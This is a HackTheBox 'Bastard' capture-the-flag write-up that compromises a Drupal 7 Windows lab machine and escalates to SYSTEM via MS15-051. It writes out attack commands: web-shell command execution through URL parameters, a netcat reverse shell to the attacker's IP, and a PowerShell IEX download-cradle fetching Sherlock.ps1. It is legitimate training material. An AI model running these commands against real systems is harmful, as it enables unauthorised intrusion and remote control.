# HackTheBox - Bastard Writeup ###### tags: `writeup` `HackTheBox` `Bastard` `medium` `OSCP` ## :computer: Port Scanning ```bash # Nmap 7.92 scan initiated Sat Apr 23 14:11:29 2022 as: nmap -sV -T4 -sS -sC -v -p- -oN Ports 10.10.10.9 Nmap scan report for 10.10.10.9 Host is up (0.044s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 23 14:14:28 2022 -- 1 IP address (1 host up) scanned in 178.68 seconds ``` Only have a web server and some Windows Ports so we it's time to look into the web. ## :eye: Enumeration If we enter on the web we can see a drupal CMS:  The first thing that i made is obtain the version using a scanner like drupwn. https://github.com/immunIT/drupwn With the enum mode i obtained the version and start looking for exploits. ```bash ./drupwn --mode enum --target http://10.10.10.9/ ```  With this scanner we can obtain some info but in my case the rest of the info was not useful. ## :bomb: Explotation Lookingg for exploits that work well without metaesploit I find this: https://www.exploit-db.com/exploits/41564 This exploit need some changes, searching some info of this exploit i found a web that explains how modify it to make able to upload new files and execute commands. https://vk9-sec.com/drupal-7-x-module-services-remote-code-execution/ We can execute comands with an URL like this: ```url http://10.10.10.9/test3.php?fexec=systeminfo ```  As the same we can execute code we can upload files to the machine, to obtain a reverse we can upload a compiled netcat binary, we can found one in the following directory: ```bash /usr/share/windows-resources/binaries/nc.exe ``` After modify the script with our ip and the port we have to start a web server with python, a netcat listener and search the URL: Start a netcat listener: ```bash rlwrap nc -nlvp 4444 ``` Start a local web server: ```bash python3 -m http.server 80 ``` ```bash http://10.10.10.9/vry4n.php?fupload=nc.exe&fexec=nc.exe -e cmd 10.10.10.10 4444 ```  With this netcat session we can read the user flag in the C:\Users\dimitris\Desktop directory and also we can read from the explorer:  After that it's time to privesc. --- ### ⏫Root Privesc We can try some methods like enumerating with WinPEAS or manual enumeration but in this case I will use modified Sherlock powershell script that has at the end the command **Find-AllVulns** to auto-start this function when i uploaded in the netcat session. In kali you can find a copy here: ```bash /usr/share/powershell-empire/empire/server/data/module_source/privesc/Sherlock.ps1 ``` Once you modify the script you have to start a web server in the location of the file like before and execute in the target with this powershell execution bypass method. ```powershell echo IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Sherlock.ps1') | powershell -noprofile - ``` After execute this we receive a list of tested vulnerabilities and some that Appears Vulnerable, I used MS15-051 to Privesc:  I download all the exploits from the github: /opt/Privesc/windows-kernel-exploits Unziped the MS15-051-KB3045171 file and uploaded the ms15-051x64.exe to the target machine   The exploit allows us to execute commands as nt authority\system so we are gonna start other netcat listener and start a new netcat connection on the machine:    And after that we have System control and we obtained the root fla. --- ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)